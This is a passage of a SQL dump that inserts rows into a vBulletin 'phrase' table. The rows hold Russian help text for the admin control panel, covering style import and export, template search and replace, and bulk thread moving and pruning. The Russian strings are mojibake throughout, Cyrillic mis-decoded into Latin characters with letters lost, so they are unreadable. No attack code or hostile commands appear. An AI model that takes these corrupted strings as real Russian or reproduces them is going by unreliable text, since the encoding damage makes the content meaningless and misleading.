(24057, -1, 'template_deletestyle_title', 'cphelptext', 'Óäà ëèòü ñòèëü', 'vbulletin', '', 0, ''),
(24058, -1, 'template_editstyle_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì îòðåäà êòèðîâà òü îñÃîâÃûå Ãà ñòðîéêè ñòèëÿ, âêëþ÷à ÿ ðîäèòåëüñêèé ñòèëü, Ãà çâà Ãèå, âîçìîæÃîñòü èñïîëüçîâà Ãèÿ ïîëüçîâà òåëÿìè è ïîðÿäîê îòîáðà æåÃèÿ.', 'vbulletin', '', 0, ''),
(24059, -1, 'template_editstyle_title', 'cphelptext', 'Ãåäà êòèðîâà òü Ãà ñòðîéêè', 'vbulletin', '', 0, ''),
(24060, -1, 'template_files_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå ñêà ÷à òü è çà ãðóçèòü ñòèëè, èñïîëüçóÿ ðà çÃîîáðà çÃûå îïöèè. Ñìîòðèòå èÃäèâèäóà ëüÃûå ðà çäåëû ïîìîùè äëÿ îïèñà Ãèÿ êà æäîé îïöèè.', 'vbulletin', '', 0, ''),
(24061, -1, 'template_files_title', 'cphelptext', 'Ñêà ÷èâà Ãèå/çà ãðóçêà ñòèëÿ', 'vbulletin', '', 0, ''),
(24062, -1, 'template_files_dostyleid_text', 'cphelptext', 'Âûáåðèòå ñòèëü, êîòîðûé æåëà åòå ñêà ÷à òü.', 'vbulletin', '', 0, ''),
(24063, -1, 'template_files_dostyleid_title', 'cphelptext', 'Ñòèëü', 'vbulletin', '', 0, ''),
(24064, -1, 'template_files_product_text', 'cphelptext', 'Âûáåðèòå ïðîäóêò, øà áëîÃû êîòîðîãî âû æåëà åòå ñêà ÷à òü.', 'vbulletin', '', 0, ''),
(24065, -1, 'template_files_product_title', 'cphelptext', 'Ãðîäóêò', 'vbulletin', '', 0, ''),
(24066, -1, 'template_files_filename_text', 'cphelptext', 'Ãòî èìÿ ôà éëà , â êîòîðûé áóäåò ñîõðà Ãåà ñòèëü. Èìÿ äîëæÃî çà êà Ã÷èâà òüñÿ ðà ñøèðåÃèåì .xml', 'vbulletin', '', 0, ''),
(24067, -1, 'template_files_filename_title', 'cphelptext', 'Èìÿ ôà éëà ', 'vbulletin', '', 0, ''),
(24068, -1, 'template_files_mode_text', 'cphelptext', 'Ñòèëè Ãà ñëåäóþò øà áëîÃû, Ãà ñòðîéêè è ïðî÷åå èç ðîäèòåëüñêèõ ñòèëåé. Åñëè âû æåëà åòå ñêà ÷à òü ñòèëü òà ê, êà ê îà îòîáðà æà åòñÿ Ãà âà øåì ôîðóìå, òî âà ì ñëåäóåò âûáðà òü âòîðóþ îïöèþ.', 'vbulletin', '', 0, ''),
(24069, -1, 'template_files_mode_title', 'cphelptext', 'Îïöèè', 'vbulletin', '', 0, ''),
(24070, -1, 'template_files_stylefile_text', 'cphelptext', 'Ãà æìèòå Ãà êÃîïêó \"Îáçîð\" è âûáåðèòå ôà éë ñòèëÿ vBullein äëÿ çà ãðóçêè ñ âà øåãî êîìïüþòåðà .', 'vbulletin', '', 0, ''),
(24071, -1, 'template_files_stylefile_title', 'cphelptext', 'Çà ãðóçêà ôà éëà XML', 'vbulletin', '', 0, ''),
(24072, -1, 'template_files_serverfile_text', 'cphelptext', 'Ââåäèòå èìÿ ôà éëà âìåñòå ñ ïóòåì ñåðâåðà îòÃîñèòåëüÃî âà øåé ãëà âÃîé äèðåêòîðèè ôîðóìà . \r\n\r\nÃà ïðèìåð, åñëè èìÿ ôà éëà ñî ñòèëåì vbulletin-style.xml è âû çà ãðóçèëè åãî â äèðåêòîðèþ install âÃóòðè âà øåé ãëà âÃîé äèðåêòîðèè ôîðóìà , òî âà ì ñëåäóåò ââåñòè çäåñü: ./install/vbulletin-style.xml', 'vbulletin', '', 0, ''),
(24073, -1, 'template_files_serverfile_title', 'cphelptext', 'Èìïîðòèðîâà Ãèå XML Ôà éëà ', 'vbulletin', '', 0, ''),
(24074, -1, 'template_files_overwritestyleid_text', 'cphelptext', 'Âûáåðèòå ñòèëü äëÿ ñëèÿÃèÿ èëè ïðîïóñòèòå ïóÃêò äëÿ ñîçäà Ãèÿ Ãîâîãî ñòèëÿ. Åñëè âû âûáðà ëè ñîçäà Ãèå Ãîâîãî ñòèëÿ, òî ÃÃ¥ çà áóäüòå óêà çà òü îïöèè Ãèæå.', 'vbulletin', '', 0, ''),
(24075, -1, 'template_files_overwritestyleid_title', 'cphelptext', 'ÑëèÿÃèå ñî ñòèëåì', 'vbulletin', '', 0, ''),
(24076, -1, 'template_files_anyversion_text', 'cphelptext', 'ÂîçìîæÃî, âû ïîæåëà åòå ïðîèãÃîðèðîâà òü âåðñèþ ôà éëà ñòèëÿ ïðè çà ãðóçêå, Ãî âû äîëæÃû çÃà òü, ÷òî îà áóäåò ñîäåðæà òü òîëüêî èçìåÃÃ¥ÃÃûå øà áëîÃû, ñîâìåñòèìûå ñ âà øåé âåðñèåé. Äà æå åñëè ñòèëü ÃÃ¥ ñîâìåñòèì ñ âà øåé âåðñèåé, âû âñåãäà ìîæåòå çà ãðóçèòü åãî è â ïîñëåäñòâèè èñïðà âèòü øà áëîÃû, èñïîëüçóÿ ñòðà Ãèöó Ãà éòè îáÃîâëåÃÃûå øà áëîÃû , êà ê ðóêîâîäñòâî.', 'vbulletin', '', 0, ''),
(24077, -1, 'template_files_anyversion_title', 'cphelptext', 'ÈãÃîðèðîâà òü âåðñèþ ñòèëÿ', 'vbulletin', '', 0, ''),
(24078, -1, 'template_findupdates_text', 'cphelptext', 'Îáû÷Ãûå øà áëîÃû ôîðóìà ÷à ñòî îáÃîâëÿþòñÿ ïðè îáÃîâëåÃèÿõ. Ãòà ñòðà Ãèöà îòîáðà æà åò, êà êèå èçìåÃÃ¥ÃÃûå øà áëîÃû ñëåäóåò âîññòà Ãîâèòü è çà Ãîâî èçìåÃèòü ïîñëå èçìåÃÃ¥Ãèÿ îáû÷Ãûõ øà áëîÃîâ.', 'vbulletin', '', 0, ''),
(24079, -1, 'template_findupdates_title', 'cphelptext', 'Ãà éòè îáÃîâëåÃÃûå øà áëîÃû', 'vbulletin', '', 0, ''),
(24080, -1, 'template_history_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîêà çûâà åò çà ïèñè âñåõ èçìåÃÃ¥Ãèé, ñäåëà ÃÃûõ ñ ýòèì øà áëîÃîì. Åñëè øà áëîà ïî óìîë÷à Ãèþ áûë îáÃîâëåà ïîñëå èçìåÃÃ¥Ãèÿ äðóãîãî øà áëîÃà , òî âåðîÿòÃî òðåáóåòñÿ èñïðà âëåÃèå ïîñëåäÃåãî (ðó÷Ãîå èçìåÃÃ¥Ãèå èëè æå ïåðåñòðîåÃèå è ïåðåÃà ñòðîéêà ). \r\n\r\nÂû ìîæåòå ïîñìîòðåòü ñðà âÃÃ¥Ãèå \"ñëîâî ê ñëîâó\" ñòà ðîãî è Ãîâîãî øà áëîÃîâ, Ãà æà â Ãà êÃîïêó \"Ñðà âÃèòü âåðñèè\".', 'vbulletin', '', 0, ''),
(24081, -1, 'template_history_title', 'cphelptext', 'Èñòîðèÿ øà áëîÃîâ', 'vbulletin', '', 0, ''),
(24082, -1, 'template_historysubmit_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëèò âà ì ñðà âÃèòü òåêóùóþ âåðñèþ øà áëîÃà è øà áëîà ïî óìîë÷à Ãèþ. ÈçìåÃÃ¥Ãèÿ âûäåëåÃû öâåòîì (ñìîòðè ëåãåÃäó âÃèçó ñòðà Ãèöû). Ãòà ñòðà Ãèöà ïîëåçÃà äëÿ ñà ìîñòîÿòåëüÃîãî îáÃîâëåÃèÿ èçìåÃèâøèõñÿ øà áëîÃîâ ïîä Ãîâûå ôóÃêöèè.', 'vbulletin', '', 0, ''),
(24083, -1, 'template_historysubmit_title', 'cphelptext', 'Ñðà âÃèòü âåðñèè', 'vbulletin', '', 0, ''),
(24084, -1, 'template_modify_text', 'cphelptext', 'Çäåñü âû ìîæåòå óïðà âëÿòü ñâîèìè ñòèëÿìè. \r\n\r\nÎòìåòêè ñëåâà îò êà æäîãî ñòèëÿ îçÃà ÷à þò, äîñòóïåà ëè ýòîò ñòèëü äëÿ âûáîðà äëÿ èñïîëüçîâà Ãèÿ Ãà âà øåì ôîðóìå ïîëüçîâà òåëÿì èëè Ãåò. Îòìå÷åÃî - ìîæÃî âûáèðà òü, ÃÃ¥ îòìå÷åÃî - Ãåëüçÿ âûáèðà òü. \r\n\r\n×òîáû ïðîñìîòðåòü âà ø ôîðóì, èñïîëüçóÿ âûáðà ÃÃûé ñòèëü, ïðîñòî Ãà æìèòå Ãà Ãà çâà Ãèå ñòèëÿ Ãà ýòîé ñòðà Ãèöå. \r\n\r\nÃîëå ñ ÷èñëà ìè äî ìåÃþ îïöèé ó êà æäîãî ñòèëÿ îçÃà ÷à åò ïîðÿäîê îòîáðà æåÃèÿ. Âû ìîæåòå îáÃîâèòü ïîðÿäîê îòîáðà æåÃèÿ Ãà ýòîé ñòðà Ãèöå, èçìåÃÿÿ ââåäåÃÃûå ÷èñëà è Ãà æà â Ãà êÃîïêó \"Ñîõðà Ãèòü ïîðÿäîê îòîáðà æåÃèÿ\" âÃèçó ñòðà Ãèöû. \r\n\r\n ìåÃþ ñïðà âà Ãà õîäèòñÿ ñïèñîê îïöèé äëÿ êà æäîãî ñòèëÿ. \r\n\r\nÃà êîÃåö, êÃîïêà \"« »\" ñïðà âà îòîáðà çèò ñïèñîê øà áëîÃîâ äëÿ êà æäîãî ñòèëÿ.', 'vbulletin', '', 0, ''),
(24085, -1, 'template_modify_title', 'cphelptext', 'Óïðà âëåÃèå ñòèëÿìè', 'vbulletin', '', 0, ''),
(24086, -1, 'template_rebuild_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå Ãà õîäÿòñÿ ñîîáùåÃèå è ïîäòâåðæäåÃèå î ïåðåñòðîåÃèè âà øèõ ñòèëåé.', 'vbulletin', '', 0, ''),
(24087, -1, 'template_rebuild_title', 'cphelptext', 'Ãåðåñòðîèòü ñòèëè', 'vbulletin', '', 0, ''),
(24088, -1, 'template_revertall_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì âîññòà Ãîâèòü âñå èçìåøÃÃûå øà áëîÃû äëÿ ýòîãî ñòèëÿ. Ãèæå Ãà õîäèòñÿ ñïèñîê øà áëîÃîâ, êîòîðûå áóäóò âîññòà ÃîâëåÃû.', 'vbulletin', '', 0, ''),
(24089, -1, 'template_revertall_title', 'cphelptext', 'Âîññòà ÃîâëåÃèå âñåõ øà áëîÃîâ', 'vbulletin', '', 0, ''),
(24090, -1, 'template_search_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå èñêà òü ñòðîêè â øà áëîÃà õ (ïîëåçÃî ïðè ïîèñêå øà áëîÃîâ, êîòîðûå âû æåëà åòå îòðåäà êòèðîâà òü, ÷òîáû èçìåÃèòü ÷òî-Ãèáóäü Ãà âà øåì ôîðóìå) è çà ïóñòèòü ïîèñê \"Ãîèñê è çà ìåÃà \", êîòîðûé ïîçâîëèò âà ì çà ìåÃèòü âñå Ãà éäåÃÃûå ñòðîêè äðóãîé ñòðîêîé.', 'vbulletin', '', 0, ''),
(24091, -1, 'template_search_title', 'cphelptext', 'Ãîèñê â øà áëîÃà õ', 'vbulletin', '', 0, ''),
(24092, -1, 'template_search_searchset_text', 'cphelptext', 'Âûáåðèòå ñòèëü, â êîòîðîì æåëà åòå èñêà òü.', 'vbulletin', '', 0, ''),
(24093, -1, 'template_search_searchset_title', 'cphelptext', 'Ãîèñê â ñòèëå', 'vbulletin', '', 0, ''),
(24094, -1, 'template_search_searchstring_text', 'cphelptext', 'Ââåäèòå ñòðîêó, êîòîðóþ æåëà åòå Ãà éòè. Ãòà ñòðîêà çà âèñèìà îò ðåãèñòðà . Ãðè ïîèñêå Ãà éäóòñÿ âñå ñëîâà /ôðà çû, ñîäåðæà ùèå ââåäåÃÃóþ ñòðîêó. Ãà ïðèìåð, ïðè ïîèñêå \"carrot\" Ãà éäóòñÿ ñëîâà \"thecarrot\", \"carrots\" è ò.ä..', 'vbulletin', '', 0, ''),
(24095, -1, 'template_search_searchstring_title', 'cphelptext', 'Ãîèñê òåêñòà ', 'vbulletin', '', 0, ''),
(24096, -1, 'template_search_titlesonly_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , ïîèñê áóäåò èäòè òîëüêî ïî Ãà çâà Ãèÿì øà áëîÃîâ. Çäåñü äåéñòâóþò òå æå ñà ìûå ïðà âèëà ïîèñêà , ÷òî è îáúÿñÃÿþòñÿ çäåñü .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24097, -1, 'template_search_titlesonly_title', 'cphelptext', 'Èñêà òü òîëüêî â çà ãîëîâêà õ', 'vbulletin', '', 0, ''),
(24098, -1, 'template_search_dostyleid_text', 'cphelptext', 'Âûáåðèòå ñòèëü, â êîòîðîì æåëà åòå èñêà òü.', 'vbulletin', '', 0, ''),
(24099, -1, 'template_search_dostyleid_title', 'cphelptext', 'Ãîèñê â ñòèëå', 'vbulletin', '', 0, ''),
(24100, -1, 'template_search_replacestring_text', 'cphelptext', 'Ââåäèòå ñþäà çà ìåÃÿþùóþ ñòðîêó. Ãòà ñòðîêà çà ìåÃèò âñå Ãà éäåÃÃûå çÃà ÷åÃèÿ ñòðîêè âûøå. \r\n\r\nÃà ïðèìåð, åñëè âû èùèòå \"carrot\" è âà øà çà ìåÃÿþùà ÿ ñòðîêà \"Carot\", òî \"zcarrot\" ñòà Ãåò \"zCarot\".', 'vbulletin', '', 0, ''),
(24101, -1, 'template_search_replacestring_title', 'cphelptext', 'Çà ìåÃà òåêñòîì', 'vbulletin', '', 0, ''),
(24102, -1, 'template_search_test_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëèò âà ì óâèäåòü ðåçóëüòà òû \"ïîèñêà è çà ìåÃû\" äî âûïîëÃÃ¥Ãèÿ äåéñòâèÿ. ÃåêîìåÃäóåòñÿ âñåãäà äåëà òü ýòî, òà ê êà ê î÷åÃü ëåãêî ìîæÃî ñëó÷à éÃî Ãà éòè è çà ìåÃèòü ÃÃ¥ òî, ÷òî õîòåëîñü.', 'vbulletin', '', 0, ''),
(24103, -1, 'template_search_test_title', 'cphelptext', 'Òîëüêî òåñò çà ìåÃû', 'vbulletin', '', 0, ''),
(24104, -1, 'template_search_regex_text', 'cphelptext', 'ÃåãóëÿðÃûå âûðà æåÃèÿ - îïöèÿ òîëüêî äëÿ ïðîäâèÃóòûõ ïîëüçîâà òåëåé ! Óñòà Ãîâêà ýòîé îïöèè â \"Äà \" áóäåò èñïîëüçîâà òü preg_replace() âìåñòî str_replace() äëÿ îïåðà öèè ïîèñêà /çà ìåÃû. ÃÃ¥ èñïîëüçóéòå ýòó îïöèþ, åñëè âû ÃÃ¥ óâåðåÃû, êà ê èñïîëüçîâà òü ïðà âèëüÃûå âûðà æåÃèÿ PCRE! \r\n\r\nÃðèìåð èñïîëüçîâà Ãèÿ: Ãîèñê <img (.*)/?> è çà ìåÃà Ãà <img \\1 /> Ãà øåë áû âñå òåãè <img> è çà ìåÃèë áû èõ XHTML ñîâìåñòèìûìè, äîáà âëÿÿ, ÷òî çà êðûòèå îáðà òÃûì ñëåøåì. Ôà êòè÷åñêà ÿ êîìà Ãäà , âûïîëÃÃ¥ÃÃà ÿ äëÿ ýòîãî, áûëà áû òà êîé: \r\n\r\npreg_replace(\'#<img (.*)/?>#siU\', \'<img \\1 />\', $template);', 'vbulletin', '', 0, ''),
(24105, -1, 'template_search_regex_title', 'cphelptext', 'Èñïîëüçîâà òü ðåãóëÿðÃûå âûðà æåÃèÿ', 'vbulletin', '', 0, ''),
(24106, -1, 'template_search_case_insensitive_text', 'cphelptext', '\"Ãåãèñòðî-ÃÃ¥ çà âèñèìûé\" ïîèñê ïðîèçâåä¸ò ïîèñê ôðà çû, ÃÃ¥ ðà çëè÷à ÿ ðåãèñòð. Ãà ïðèìåð, ñòðîêà ïîèñêà : \r\n\r\nzÌà ðêîâü Ãà õ! \r\n\r\n...Ãà éä¸ò ïîìèìî ïðî÷åãî: \r\n\r\nzÌà ðêÎÂü Ãà Õ! ', 'vbulletin', '', 0, ''),
(24107, -1, 'template_search_case_insensitive_title', 'cphelptext', 'Ãå÷óâñòâèòåëüÃûé ê ðåãèñòðó', 'vbulletin', '', 0, ''),
(24108, -1, 'template_view_text', 'cphelptext', 'Ãòà ñòðà Ãèöà îòîáðà çèò âà ø îáû÷Ãûé êîä äëÿ ýòîãî øà áëîÃà . Âû ìîæåòå ñêîïèðîâà òü êîä äëÿ èñïîëüçîâà Ãèÿ, Ãî îòðåäà êòèðîâà òü åãî ÃÃ¥ ñìîæåòå.', 'vbulletin', '', 0, ''),
(24109, -1, 'template_view_title', 'cphelptext', 'Ãîêà çà òü ïî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
(24110, -1, 'thread_text', 'cphelptext', 'Óïðà âëåÃèå òåìà ìè è ñîîáùåÃèÿìè: \r\nÃòîò ðà çäåë ïà Ãåëè à äìèÃèñòðà òîðà ïîçâîëÿåò âà ì ìà ññîâî óïðà âëÿòü âà øèìè òåìà ìè è ñîîáùåÃèÿìè. Âû ìîæåòå ìà ññîâî óäà ëèòü èëè ïåðåìåñòèòü òåìû è ñîîáùåÃèÿ, îñÃîâûâà ÿñü Ãà Ãåñêîëüêèõ êðèòåðèÿõ, ìà ññîâî îòïèñà òü ïîëüçîâà òåëåé îò òåì, óäà ëèòü îïðîñû èç òåì è óâèäåòü, êòî çà ÷òî ãîëîñîâà ë â îïðîñà õ. \r\n\r\nÂîçìîæÃûì ïðèìåÃÃ¥Ãèåì äëÿ ìà ññîâîãî óäà ëåÃèÿ òåì ÿâëÿåòñÿ óäà ëåÃèå òåì ñïà ìåðîâ è îñâîáîæäåÃèå ìåñòà â âà øåé áà çå äà ÃÃûõ ñ ïîìîùüþ óäà ëåÃèÿ ñòà ðûõ òåì.  ïðèìåÃÃ¥Ãèå ìà ññîâîãî ïåðåìåùåÃèÿ âõîäèò ðåîðãà Ãèçà öèÿ âà øèõ ðà çäåëîâ è à ðõèâèðîâà Ãèå ñòà ðûõ òåì. Âû ìîæåòå îòïèñà òü ïîëüçîâà òåëåé îò òåì, ÷òîáû ïðåêðà òèòü îòñûëêó óâåäîìëåÃèé ïî ýëåêòðîÃÃîé ïî÷òå â ðåçóëüòà òå òåêóùèõ ïîäïèñîê Ãà òåìû. Âû ìîæåòå óäà ëèòü îïðîñû èç òåìû, åñëè âû ïðîñòî æåëà åòå óäà ëèòü îïðîñ áåç óäà ëåÃèÿ òåìû. È, Ãà êîÃåö, îïöèÿ \"Êòî ãîëîñîâà ë\" ïîëåçÃà äëÿ ïðîâåðêè \"ñîäåðæèìîãî ÿùèêà äëÿ ãîëîñîâà Ãèÿ.\"', 'vbulletin', '', 0, ''),
(24111, -1, 'thread_title', 'cphelptext', 'ÃŽ óïðà âëåÃèè òåìà ìè è ñîîáùåÃèÿìè', 'vbulletin', 'zCarot', 1219189890, '3.8.0 Alpha 1'),
(24112, -1, 'thread_dothreads_pruneuser_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå Ãà õîäÿòñÿ îïöèè äëÿ óäà ëåÃèÿ/ïåðåìåùåÃèÿ âñåõ èëè âûáðà ÃÃûõ âà ìè ñîîòâåòñòâóþùèõ òåì. Åñëè âû âûáåðèòå äåéñòâèå Ãà ä âñåìè òåìà ìè, òî îÃî áóäåò ïðîèçâåäåÃî ÃåìåäëåÃÃî. Åñëè âû âûáåðèòå âûáîðî÷Ãîå äåéñòâèå, òî âà ñ ïåðåÃà ïðà âÿò Ãà ñòðà Ãèöó, ãäå âà ì ÃóæÃî áóäåò îòìåòèòü ÃóæÃûå òåìû.', 'vbulletin', '', 0, ''),
(24113, -1, 'thread_dothreads_pruneuser_title', 'cphelptext', 'Âûáîðî÷Ãîå óäà ëåÃèå/ïåðåìåùåÃèå òåì', 'vbulletin', '', 0, ''),
(24114, -1, 'thread_dothreadssel_text', 'cphelptext', 'Ãèæå Ãà õîäèòñÿ ñïèñîê âñåõ ïîäõîäÿùèõ òåì. Îòìåòüòå âñå òåìû, Ãà ä êîòîðûìè âû æåëà åòå ñîâåðøèòü äåéñòâèå. Ãà æìèòå êÃîïêó \"Âïåð¸ä\" äëÿ ïðîäîëæåÃèÿ. Âû ìîæåòå ïîñìîòðåòü òåìó â Ãîâîì îêÃÃ¥, Ãà æà â Ãà å¸ Ãà çâà Ãèå.', 'vbulletin', '', 0, ''),
(24115, -1, 'thread_dothreadssel_title', 'cphelptext', 'Âûáîðî÷Ãîå óäà ëåÃèå/ïåðåìåùåÃèå', 'vbulletin', '', 0, ''),
(24116, -1, 'thread_dovotes_text', 'cphelptext', 'Ãòà ñòðà Ãèöà îòîáðà çèò âà ì ðåçóëüòà òû ãîëîñîâà Ãèÿ, à òà êæå óêà æåò, êòî çà ÷òî ãîëîñîâà ë â âûáðà ÃÃîì îïðîñå. Âû ìîæåòå ïðîñìîòðåòü ýòîò îïðîñ âìåñòå ñ åãî òåìîé, Ãà æà â Ãà èõ ññûëêè â âåðõÃåé ïà Ãåëè. Âû ìîæåòå ïðîñìîòðåòü ïðîôèëè ãîëîñîâà âøèõ ïîëüçîâà òåëåé, Ãà æà â Ãà èõ èìåÃà .', 'vbulletin', 'zCarot', 1204936670, '3.7.0 Release Candidate 1'),
(24117, -1, 'thread_dovotes_title', 'cphelptext', 'Ãåçóëüòà òû ãîëîñîâà Ãèÿ', 'vbulletin', '', 0, ''),
(24118, -1, 'thread_killpoll_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì óäà ëèòü îïðîñ èç òåìû, îñÃîâûâà ÿñü Ãà ID ñîîòâåòñòâóþùåé òåìû.', 'vbulletin', '', 0, ''),
(24119, -1, 'thread_killpoll_title', 'cphelptext', 'Óäà ëèòü îïðîñ', 'vbulletin', '', 0, ''),
(24120, -1, 'thread_killpoll_threadid_text', 'cphelptext', 'Ââåäèòå ID òåìû, èç êîòîðîé æåëà åòå óäà ëèòü îïðîñ. Âû ìîæåòå óçÃà òü ID ÃóæÃîé òåìû, âçãëÿÃóâ Ãà å¸ à äðåñ. Ãà ïðèìåð, òåìà ñ URL http://www.example.com/forum/showthread.php?t=2 èìååò ID òåìû 2.', 'vbulletin', '', 0, ''),
(24121, -1, 'thread_killpoll_threadid_title', 'cphelptext', 'Ââåäèòå ID òåìû', 'vbulletin', '', 0, ''),
(24122, -1, 'thread_move_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì ìà ññîâî ïåðåìåùà òü òåìû, îñÃîâûâà ÿñü Ãà Ãåñêîëüêèõ êðèòåðèÿõ. Çà ïîëÃèòå îïöèè Ãèæå è Ãà æìèòå \"Ãåðåìåñòèòü òåìû\" äëÿ âûïîëÃÃ¥Ãèÿ. Ãà æà òèå Ãà êÃîïêó \"Ãåðåìåñòèòü òåìû\" ñðà çó ÃÃ¥ âûïîëÃÿåò ïåðåìåùåÃèå, à ñÃà ÷à ëà äà ¸ò âà ì âûáîð ïîëÃîãî èëè âûáîðî÷Ãîãî ïåðåìåùåÃèÿ âñåõ ñîîòâåòñòâèé.', 'vbulletin', '', 0, ''),
(24123, -1, 'thread_move_title', 'cphelptext', 'Óïðà âëåÃèå ïåðåìåùåÃèåì òåì', 'vbulletin', '', 0, ''),
(24124, -1, 'thread_move_destforumid_text', 'cphelptext', 'Âûáåðèòå ðà çäåë, â êîòîðûé âû æåëà åòå ïåðåìåñòèòü òåìû, ñîîòâåòñòâóþùèå êðèòåðèÿì Ãèæå.', 'vbulletin', '', 0, ''),
(24125, -1, 'thread_move_destforumid_title', 'cphelptext', 'Ãîìåñòèòü â ðà çäåë', 'vbulletin', '', 0, '');
INSERT INTO `phrase` (`phraseid`, `languageid`, `varname`, `fieldname`, `text`, `product`, `username`, `dateline`, `version`) VALUES
(24126, -1, 'thread_prune_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì ìà ññîâî óäà ëÿòü òåìû, îñÃîâûâà ÿñü Ãà Ãåñêîëüêèõ êðèòåðèÿõ. Çà ïîëÃèòå îïöèè Ãèæå è Ãà æìèòå \"Óäà ëèòü òåìû\" äëÿ âûïîëÃÃ¥Ãèÿ. Ãà æà òèå Ãà êÃîïêó \"Óäà ëèòü òåìû\" ñðà çó ÃÃ¥ âûïîëÃÿåò óäà ëåÃèå, à ñÃà ÷à ëà äà ¸ò âà ì âûáîð ïîëÃîãî èëè âûáîðî÷Ãîãî óäà ëåÃèÿ âñåõ ñîîòâåòñòâèé.', 'vbulletin', '', 0, ''),
(24127, -1, 'thread_prune_title', 'cphelptext', 'Óïðà âëåÃèå óäà ëåÃèåì òåì', 'vbulletin', '', 0, ''),
(24128, -1, 'thread_prune_username_text', 'cphelptext', 'Äëÿ óäà ëåÃèÿ òåì ïî èìåÃè ñîçäà òåëÿ òåìû âà ì ñëåäóåò óêà çà òü çäåñü åãî èìÿ. Ââåäèòå òî÷Ãîå èìÿ ïîëüçîâà òåëÿ, ÷üè òåìû âû æåëà åòå óäà ëèòü.', 'vbulletin', '', 0, ''),
(24129, -1, 'thread_prune_username_title', 'cphelptext', 'Èìÿ', 'vbulletin', '', 0, ''),
(24130, -1, 'thread_prune_move_originaldaysolder_text', 'cphelptext', 'Åñëè òåìà ñîçäà Ãà áîëåå Õ äÃåé Ãà çà ä, òî îÃà áóäåò óäà ëåÃà /ïåðåìåùåÃà . Ãòî ïîëåçÃî äëÿ âûáîðêè ñòà ðûõ òåì.', 'vbulletin', '', 0, ''),
(24131, -1, 'thread_prune_move_originaldaysolder_title', 'cphelptext', 'Ãåðâîå ñîîáùåÃèå îòïðà âëåÃî áîëåå X äÃåé Ãà çà ä', 'vbulletin', '', 0, ''),
(24132, -1, 'thread_prune_move_originaldaysnewer_text', 'cphelptext', 'Åñëè òåìà ñîçäà Ãà â òå÷åÃèè Õ äÃåé, òî îÃà áóäåò óäà ëåÃà /ïåðåìåùåÃà . Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ âìåñòå ñ ïðåäûäóùåé, ÷òîáû ñîçäà òü âðåìåÃÃîé ïðîìåæóòîê, â êîòîðîì ñëåäóåò óäà ëèòü/ïåðåìåñòèòü òåìû.', 'vbulletin', '', 0, ''),
(24133, -1, 'thread_prune_move_originaldaysnewer_title', 'cphelptext', 'Ãåðâîå ñîîáùåÃèå îòïðà âëåÃî ìåÃåå X äÃåé Ãà çà ä', 'vbulletin', '', 0, ''),
(24134, -1, 'thread_prune_move_lastdaysolder_text', 'cphelptext', 'Åñëè Ãèêòî ÃÃ¥ îñòà âëÿë ñîîáùåÃèÿ â ýòîé òåìå êà ê ìèÃèìóì Õ äÃåé, òî îÃà áóäåò óäà ëåÃà /ïåðåìåùåÃà . Ãòî ïîëåçÃî äëÿ âûáîðêè òåì, êîòîðûå óæå ÃÃ¥ à êòèâÃû.', 'vbulletin', '', 0, ''),
(24135, -1, 'thread_prune_move_lastdaysolder_title', 'cphelptext', 'ÃîñëåäÃåå ñîîáùåÃèå îòïðà âëåÃî áîëåå X äÃåé Ãà çà ä', 'vbulletin', '', 0, ''),
(24136, -1, 'thread_prune_move_lastdaysnewer_text', 'cphelptext', 'Åñëè êòî-òî Ãà ïèñà ë â ýòîé òåìå â òå÷åÃèè Õ äÃåé, òî îÃà áóäåò óäà ëåÃà /ïåðåìåùåÃà . Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ âìåñòå ñ ïðåäûäóùåé, ÷òîáû ñîçäà òü âðåìåÃÃîé ïðîìåæóòîê, â êîòîðîì ñëåäóåò óäà ëèòü/ïåðåìåñòèòü òåìû.', 'vbulletin', '', 0, ''),
(24137, -1, 'thread_prune_move_lastdaysnewer_title', 'cphelptext', 'ÃîñëåäÃåå ñîîáùåÃèå îòïðà âëåÃî ìåÃåå X äÃåé Ãà çà ä', 'vbulletin', '', 0, ''),
(24138, -1, 'thread_prune_move_repliesleast_text', 'cphelptext', 'Åñëè â òåìå åñòü êà ê ìèÃèìóì Õ îòâåòîâ, òî îÃà áóäåò óäà ëåÃà /ïåðåìåùåÃà . Ãòî ïîëåçÃî äëÿ óäà ëåÃèÿ/ïåðåìåùåÃèÿ áîëüøèõ òåì.', 'vbulletin', '', 0, ''),
(24139, -1, 'thread_prune_move_repliesleast_title', 'cphelptext', 'Òåìà èìååò ÃÃ¥ ìåÃåå X îòâåòîâ', 'vbulletin', '', 0, ''),
(24140, -1, 'thread_prune_move_repliesmost_text', 'cphelptext', 'Åñëè â òåìå ñîäåðæèòñÿ ìåÃåå Õ îòâåòîâ, òî îÃà áóäåò óäà ëåÃà /ïåðåìåùåÃà . Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ âìåñòå ñ ïðåäûäóùåé, ÷òîáû çà äà òü ïðîìåæóòîê äëÿ îòâåòîâ, â êîòîðîì ñëåäóåò óäà ëèòü/ïåðåìåñòèòü òåìû.', 'vbulletin', '', 0, ''),
(24141, -1, 'thread_prune_move_repliesmost_title', 'cphelptext', 'Òåìà èìååò ÃÃ¥ áîëåå X îòâåòîâ', 'vbulletin', '', 0, ''),
